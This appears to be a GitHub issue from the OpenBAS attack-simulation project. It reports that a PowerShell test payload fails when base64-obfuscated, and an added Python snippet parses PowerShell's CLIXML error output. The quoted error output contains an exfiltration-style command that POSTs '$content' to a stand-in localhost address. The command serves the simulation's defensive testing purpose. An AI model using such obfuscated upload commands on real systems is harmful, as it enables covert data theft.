Powershell command is not working as expected when using base64 obfuscation #72

@SamuelHassine

Description

Powershell command is not working as expected when using base64 obfuscation.

For the same payload, working as expected in plain text:

MAYBE_PREVENTED {"stdout":"","stderr":"Invoke-WebRequest : Unable to connect to the remote server\r\nAt line:2 char:1\r\n+ Invoke-WebRequest -Uri http://127.0.0.1 -Method POST -Body $content\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n    + CategoryInfo          : NotSpecified: (:) [Invoke-WebRequest], WebException\r\n    + FullyQualifiedErrorId : System.Net.WebException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand\r\n \r\n","exit_code":1}

https://reference.openbas.io/admin/atomic_testings/542aa4e6-ba80-4405-aaef-32332929a5de?query=cGFnZT0wJnNpemU9MjAmZmlsdGVyR3JvdXAlNUJtb2RlJTVEPWFuZCZmaWx0ZXJHcm91cFtmaWx0ZXJzXVtdJmtleT1BR0VOVF81NDJhYTRlNi1iYTgwLTQ0MDUtYWFlZi0zMjMzMjkyOWE1ZGVfZmlsdGVycw%3D%3D

In base64, another error:

MAYBE_PREVENTED {"stdout":"","stderr":"#< CLIXML\r\n<Objs Version=\"1.1.0.1\" xmlns=\"http://schemas.microsoft.com/powershell/2004/04\"><Obj S=\"progress\" RefId=\"0\"><TN RefId=\"0\"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N=\"SourceId\">1</I64><PR N=\"Record\"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj><Obj S=\"progress\" RefId=\"1\"><TNRef RefId=\"0\" /><MS><I64 N=\"SourceId\">1</I64><PR N=\"Record\"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj><S S=\"Error\">Invoke-WebRequest : Unable to connect to the remote server_x000D__x000A_</S><S S=\"Error\">At line:2 char:1_x000D__x000A_</S><S S=\"Error\">+ Invoke-WebRequest -Uri http://127.0.0.1 -Method POST -Body $content_x000D__x000A_</S><S S=\"Error\">+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><S S=\"Error\">    + CategoryInfo          : NotSpecified: (:) [Invoke-WebRequest], WebException_x000D__x000A_</S><S S=\"Error\">    + FullyQualifiedErrorId : System.Net.WebException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand_x000D__x000A_</S><S S=\"Error\"> _x000D__x000A_</S></Objs>","exit_code":1}

https://reference.openbas.io/admin/atomic_testings/0cdcd5cf-eb18-40a9-b2a8-3019e81d38d3?query=cGFnZT0wJnNpemU9MjAmZmlsdGVyR3JvdXAlNUJtb2RlJTVEPWFuZCZmaWx0ZXJHcm91cFtmaWx0ZXJzXVtdJmtleT1BR0VOVF8wY2RjZDVjZi1lYjE4LTQwYTktYjJhOC0zMDE5ZTgxZDM4ZDNfZmlsdGVycw%3D%3D
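
An added example, not part of the issue and not OpenBAS code: the second stderr above begins with `#< CLIXML` and carries the same Invoke-WebRequest error as `<S S="Error">` elements, so a consumer can normalize it to plain text before comparing the two runs. The names `normalize_stderr`, `unescape_clixml` and `SAMPLE` are hypothetical, and the sample is constructed from the output quoted above.

```python
import re
import xml.etree.ElementTree as ET

CLIXML_HEADER = "#< CLIXML"
PS_NS = "{http://schemas.microsoft.com/powershell/2004/04}"
# CLIXML escapes characters as _xHHHH_ (four hex digits), e.g. _x000D__x000A_ for CRLF
ESCAPE = re.compile(r"_x([0-9A-Fa-f]{4})_")

# Constructed sample, shortened from the CLIXML stderr quoted in the issue
SAMPLE = (
    '#< CLIXML\r\n<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">'
    '<Obj S="progress" RefId="0"><MS><I64 N="SourceId">1</I64>'
    '<PR N="Record"><AV>Preparing modules for first use.</AV></PR></MS></Obj>'
    '<S S="Error">Invoke-WebRequest : Unable to connect to the remote server_x000D__x000A_</S>'
    '<S S="Error">At line:2 char:1_x000D__x000A_</S></Objs>'
)


def unescape_clixml(text):
    """Decode _xHHHH_ escapes; a literal underscore is itself sent as _x005F_."""
    return ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def normalize_stderr(stderr):
    """Return plain-text stderr; CLIXML input is reduced to its Error stream."""
    body = stderr.lstrip()
    if not body.startswith(CLIXML_HEADER):
        return stderr  # already plain text
    xml_part = body[len(CLIXML_HEADER):].lstrip()
    # Endpoint output is untrusted input: refuse DTDs/entities instead of parsing them
    if "<!DOCTYPE" in xml_part or "<!ENTITY" in xml_part:
        return stderr
    try:
        root = ET.fromstring(xml_part)
    except ET.ParseError:
        return stderr  # truncated or malformed: keep the raw text
    # Top-level <S S="Error"> strings are the error stream; progress <Obj> records are skipped
    errors = [s.text or "" for s in root.findall(PS_NS + "S") if s.get("S") == "Error"]
    return "".join(unescape_clixml(e) for e in errors)


if __name__ == "__main__":
    print(normalize_stderr(SAMPLE))
```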

Labels: bug (use for describing something not working as expected)
